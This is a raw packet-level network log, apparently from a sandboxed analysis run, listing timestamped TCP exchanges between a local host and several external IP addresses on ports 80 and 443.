Jul 2, 2024 00:05:08.160301924 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160332918 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160479069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160504103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160514116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160525084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160535097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160545111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160554886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160564899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160568953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160568953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160574913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160586119 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160587072 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160597086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160598040 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160608053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160619020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160629034 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160629988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160644054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160679102 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160679102 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160828114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160844088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160855055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160865068 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160876036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160883904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160883904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160886049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160897017 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160907984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160918951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160918951 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160928965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160931110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160940886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160950899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160952091 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.160962105 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160974026 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.160988092 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161000967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161015987 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161360979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161376953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161387920 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161397934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161408901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161411047 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161420107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161427975 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161432028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161448956 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161461115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161472082 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161482096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161487103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161505938 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161506891 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161535025 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161592960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161603928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161613941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161644936 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161679983 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161689997 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161700010 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161709070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161719084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161736965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161737919 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161747932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161751986 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161763906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161775112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161786079 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161787033 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161798000 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161829948 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161829948 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161848068 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161943913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161955118 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161964893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161974907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161986113 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.161993027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161993980 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.161995888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162008047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162018061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162029982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162033081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162040949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162054062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162058115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162058115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162082911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162120104 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162415981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162427902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162439108 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162448883 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162466049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162475109 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162477016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162487984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162503004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162512064 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162512064 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162518978 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162523985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162534952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162544966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162549973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162552118 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162560940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162570953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162576914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162584066 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162587881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162600040 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162611008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162614107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162614107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162632942 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162661076 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162919998 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162930965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162940979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162950993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162961006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162971020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162981987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.162985086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162985086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.162992954 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.163002968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.163009882 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.163013935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.163026094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.163028955 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.163037062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.163049936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.163059950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.163059950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.163110018 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.184803963 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184815884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184827089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184838057 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184849977 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184858084 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.184859991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184874058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184885025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.184900045 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.184916019 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.184959888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185054064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185065031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185075045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185085058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185096025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185101032 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185106039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185116053 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185126066 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185133934 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185138941 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185144901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185156107 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185164928 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185164928 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185165882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185178041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185220003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185220003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185319901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185329914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185339928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185348988 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185359955 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185369015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185378075 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185388088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185398102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185404062 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185404062 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185406923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185416937 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185427904 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185431004 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185436964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185444117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185447931 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185453892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185477018 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185514927 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185523033 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185631990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185640097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185651064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185661077 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185672045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185682058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185692072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185698032 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185703039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185714006 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185715914 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185724974 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185735941 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185746908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185756922 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185762882 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185762882 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185762882 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185817003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.185939074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185950041 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185959101 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.185981989 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186000109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186006069 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186006069 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186009884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186019897 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186031103 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186041117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186041117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186041117 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186050892 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186064005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186073065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186079025 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186083078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186085939 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186094999 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186129093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186129093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186338902 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186350107 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186359882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186369896 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186379910 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186389923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186398983 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186403990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186403990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186410904 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186444998 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186444998 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186764002 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186774969 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186784029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186794043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186805010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186815023 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186822891 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186825037 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.186839104 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.186934948 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191112995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191123962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191134930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191173077 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191185951 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191206932 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191217899 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191227913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191239119 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191262007 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191304922 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191411972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191423893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191435099 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191445112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191452026 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191490889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191509962 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191755056 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191765070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191775084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191785097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191796064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191806078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191817045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191826105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191831112 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191831112 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191837072 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.191864967 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.191864967 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.192038059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192050934 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192060947 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192070961 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192080975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192091942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192101955 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.192121029 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.192121029 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.192166090 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.195565939 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.195581913 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.195759058 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.195823908 CEST	49735	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.195981979 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.196042061 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.196387053 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.196508884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.196652889 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.198240042 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.202924967 CEST	80	49735	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.202980042 CEST	49735	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.204785109 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204797029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204807997 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204818010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204828024 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204837084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204847097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204848051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.204871893 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.204874039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204885006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204885960 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.204895020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.204906940 CEST	80	49716	77.105.133.27	192.168.2.6
